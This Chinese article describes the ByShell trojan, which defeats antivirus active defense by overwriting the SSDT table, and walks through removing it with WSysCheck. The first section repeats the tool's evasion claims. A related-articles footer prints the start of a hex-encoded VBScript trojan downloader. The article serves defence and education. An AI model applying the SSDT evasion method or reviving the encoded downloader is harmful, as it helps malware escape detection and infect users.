ByShell:一个穿越主动防御的木马

《电脑报》提到了一个可以轻松穿越卡巴,瑞星,诺顿的主动防御功能的免杀木马:byshell。于是在网上搜,搜到byshell推广版的说明是:可以穿越卡巴瑞星诺顿的默认设置主动防御。我就下了个推广版回来试下微点能不能防,生成服务端后一运行,微点没有让人失望,立刻报告说发现未知监控软件。本来还想试下远程监控看看微点会不会提示有可疑程序访问网络之类的,因为在单位上班,还是放弃了念头。

BYshell的说明里说,高级版采用新内核驱动,可以轻松穿透 ZA 6/7版,麦咖啡安全套装,麦咖啡8.5i 标准版,KIS 6 卡巴安全套装(包括交互模式),诺顿安全套装2007,瑞星2007,小红伞和趋势2006 这些杀软的高级别安全设置。不过里面没提到微点,估计作者还没把微点列入考虑范围,如果微点的工程师有兴趣不妨弄个高级版来研究下,看看是否真的那么牛X。如果真能穿越这一大排知名杀软却被微点轻松拿下那就开心了。

如何清除能突破主动防御的木马

病人:我使用的杀毒软件有主动防御功能,能拦截木马,可最近我的邮箱账号还是被盗了,为什么会这样?

医生:这个其实也是很正常的,毕竟没有一款杀毒软件是万能的,能够阻止目前所有的恶意程序。你的电子信箱被盗很可能是被那种能突破主动防御木马,例如最新的ByShell木马。这是一类新型木马,其最大的特点就是可以轻松的突破杀毒软件的主动防御功能。

利用SSDT绕过主动防御

病人:像ByShell这样的木马,它们是如何突破主动防御的呢?

医生:最早黑客通过将系统日期更改到较早前的日期,这样杀毒软件就会自动关闭所有监控功能,当然主动防御功能也就自动失去了防控能力。现在已经有很多木马不需要调整系统时间就可以成功突破主动防御功能了。

Windows系统中有一个SSDT表,SSDT的全称是System Services Descriptor Table,中文名称为“系统服务描述符表”。这个表就是把应用层指令传输给系统内核的一个通道。

而所有杀毒软件的主动防御功能都是通过修改SSDT表,让恶意程序不能按照正常的情况来运行,这样就可以轻易的对恶意程序进行拦截。如果你安装了包括主动防御功能的杀毒软件,可以利用冰刃的SSDT功能来查看,就会发现有红色标注的被修改的SSDT表信息。

而ByShel木马通过对当前系统的SSDT表进行搜索,接着再搜索系统原来的使用的SSDT表,然后用以前的覆盖现在的SSDT表。木马程序则又可以按照正常的顺序来执行,这样就最终让主动防御功能彻底的失效呢。

小提示:Byshell采用国际领先的穿透技术,采用最新的内核驱动技术突破杀毒软件的主动防御。包括卡巴斯基、瑞星、趋势、诺顿等国内常见的杀毒软件,以及这些杀毒软件最新的相关版本,都可以被Byshell木马成功的进行突破。

主动防御类木马巧清除

病人:我明白了这类木马的原理了,但还是不知道怎么清除?

医生:清除方法不难,和清除其他的木马程序方法类似。下面我们以清除典型的ByShell木马为例讲解具体操作。

第一步:首先运行安全工具WSysCheck,点击“进程管理”标签可以看到多个粉红色的进程,这说明这些进程都被插入了木马的线程。点击其中的为粉色的IE浏览器进程,发现其中包括了一个可疑的木马模块hack.dll(图1)。当然有的时候黑客会设置其他名称,这时我们只要看到没有“文件厂商”信息的,就需要提高自己的警惕。

第二步:接着点击程序的“服务管理”标签,同样可以看到多个红色的系统服务,这说明这些服务都不是系统自身的服务。经过查看发现一个名为hack的服务较为可疑,因为它的名称和木马模块的名称相同(图2)。

同样如果黑客自定义其他名称的服务,则在“状态”栏看到标注为“未知”的服务,我们就要注意了,最好一一排查。

第三步:点击程序的“文件管理”标签后,在模拟的资源管理器窗口中,按照可疑模块的路径指引,很快发现了那个可疑的木马模块文件hack.dll,与此同时还发现一个和模块文件同名的可执行文件(图3)。看来这个木马主要还是由这两个文件组成的。

第四步:现在我们就开始进行木马的清除工作。在“进程管理”中首先找到粉红色IE浏览器进程,选中它后通过鼠标右键中的“结束这个进程”命令清除它。接着点击“服务管理”标签,选择名为hack的服务后,点击右键菜单中的“删除选中的服务”命令来删除。

再选择程序中的“文件管理”标签,对木马文件进行最后的清除操作。在系统的system32目录找到hack.dll和hack.exe文件后,点击右键菜单中的“直接删除文件”命令,完成对木马的最后一击。现在重新启动系统再进行查看,确认木马中的被清除干净呢。

第五步:由于木马程序破坏了杀毒软件在SSDT表中的内容,因此大家最好利用软件自带的主动修复功能来进行修复,或者直接重新将杀毒软件安装一次即可。

总结

以前的木马种植以前,黑客最重要的工作就是对其进行免杀操作,这样就可以躲过杀毒软件的特征码检测。是黑客现在除了进行基本的免杀外,还要想如何才能突破主动防御的功能。不过已经有木马可以突破主动防御,以后这类木马也会越来越多,因此大家一定要加强自己的安全意识。

时间: 2024-11-30 12:42:59

ByShell:一个穿越主动防御的木马的相关文章

一个收集的下载木马并运行的VBS代码_vbs

<script language="VBScript">  S="2020206F6E206572726F7220726573756D65206E6578740D0A737  3733D226D64622E657865220D0A61613D226F62220D0A6161613D22  6A65220D0A616161613D226374220D0A61616161613D22636C61220  D0A6161616161613D2273736964220D0

一个针对中国用户的安卓木马

近日,Doctor Web安全小组发现了一个新的Android木马,被命名为Android.Backdoor.260.origin.该木马在中国用户之间传播,监视着受害者的信息.攻击者可以利用该木马劫持受害者的短信.通话记录.定位GPS坐标.屏幕截图,甚至还可以搜集所有用户输入的数据. 由于Android.Backdoor.260.origin会以"AndroidUpdate"名字散播,所以受害者很有可能在他们的移动设备上安装它. 木马详情分析 Android.Backdoor.260

一个月内发现的第六起Linux DDoS木马

Linux 用户又有一个木马需要苦恼了,就像以往一样,这些坏蛋大多部署在被劫持的 Linux 系统上,并在接受到命令后发起 DDoS 攻击. 发现了这件事的 Dr.Web 的安全研究人员说,木马似乎是通过破壳漏洞Shellshock感染的这些 Linux 机器--现在仍然有很多设备没有补上这个漏洞. 该木马被命名为 Linux.DDoS.93,它首要会修改 /var/run/dhcpclient-eth0.pid 这个文件,并通过它在计算机启动时运行.如果该文件不存在,就会自己创建一个. 当该木

"飓风"木马强攻云安全 杀毒厂商如临大敌

近日,一个名为"BoHu高清影音"的木马插件令很多杀毒厂商如临大敌.据悉,该插件捆绑了专门破坏杀毒软件"云安全"功能的"飓风"木马,不仅屏蔽杀毒厂商云安全服务器, 还会干扰杀毒软件的联网通讯和升级,使用户无法清除木马.有杀毒厂商惊呼,已有超过12万台电脑遭此类木马感染.作为国内最早推出"云查杀引擎"的云安全软件,360安全卫士用户是否也会受到"飓风"木马的攻击呢?对此,360安全专家表示:360安全卫士和3

揭秘木马常见的四大伪装欺骗行为

黑客们是不会甘于寂寞的,所以就出现了很多更容易让人上当的木马伪装手段.本文介绍一些常见的木马伪装手段,希望对大家有所帮助. 1.将木马包装为图像文件 首先,黑客最常使用骗别人执行木马的方法,就是将特洛伊木马说成为图像文件,比如说是照片等,应该说这是一个最不合逻辑的方法,但却是最多人中招的方法,有效而又实用. 只要入侵者扮成美眉及更改服务器程序的文件名(例如sam.exe)为"类似"图像文件的名称,再假装传送照片给受害者,受害者就会立刻执行它.为甚么说这是一个不合逻辑的方法呢?图像文件的

做精明的赶马人:木马查找清除攻略

这年头的网络越来越不安全了,黑客制作工具比Word还要简单,随便一个菜鸟都可以借助工具制作出"马"力强劲的攻击武器.看网页.收邮件.聊QQ都有可能被马"踩"到.稍不留意,你的个人信息.账户.密码等重要信息就会被它"驮"走,你知道如何识马.抓马.赶马吗?下面的招数将告诉你如何对付这些顽劣的马. 一.学伯乐 认马识马 木马这东西从本质上说,就是一种远程控制软件.不过远程控制软件也分正规部队和山间土匪.正规部队顾名思义就是名正言顺的帮你远程管理和设置电

如何识别驱动木马

一提起木马或者病毒,大家都会是一脸憎恶且避而远之的态度.但是现实却是残酷的,在当今这个时代,国内用于家庭和企业的电脑,平均每十台就有至少一台感染过后门,染毒途径除了移动媒介扩散以外,最常见的就是网络途径,如那些被植入木马的网站.网络中爬行的蠕虫.即时聊天系统传输的文件.系统漏洞导致的入侵植马和带毒的电子邮件等.可以说,各种途径都可能使你的计算机受到感染,即使你只是打开了几个网站页面看看当天的时事新闻. 正所谓知己知彼.百战不殆,要想远离木马或病毒的骚扰,当然需要我们对它们有详细的了解,才能让我们

新型银行木马IcedID现身,具备双重攻击能力

IBM X-Force研究团队是世界上最知名的商业安全研究团队之一.这些安全专家可监视并分析各种来源的安全问题,提供威胁情报内容并将其作为IBM Security产品服务组合的基础.IBM X-Force 可生成多项思想领先的安全研究资产,帮助客户.研究人员和公众更深入地了解最新的安全风险,提前预知新兴威胁. 最近,IBM X-Force发现了一个新型的银行木马,他们将其命名为"IcedID",目前似乎正处于开发的初始阶段. 尽管IcedID目前还不够完善,但它已经展现出了一些先进的功

卡巴斯基:IE浏览器高危漏洞被木马利用

近日,微软Internet Explorer浏览器爆出高危漏洞,微软已经发布公告提醒用户,并承诺将修复该漏洞.与此同时,该漏洞也已经被木马所利用.知名信息安全厂商卡巴斯基实验室在爆出该漏洞之后很快就检测到了一个可以利用这个漏洞的木马. 据了解,此木马是一个恶意网页脚本木马,会打开带有漏洞利用程序的恶意flash文件,利用最近爆出的微软Internet Explorer浏览器高危漏洞向用户计算机中下载安装后门木马,使用户计算机被黑客操纵. 用户在用IE浏览器浏览含有此木马的网页时,此木马会加载一个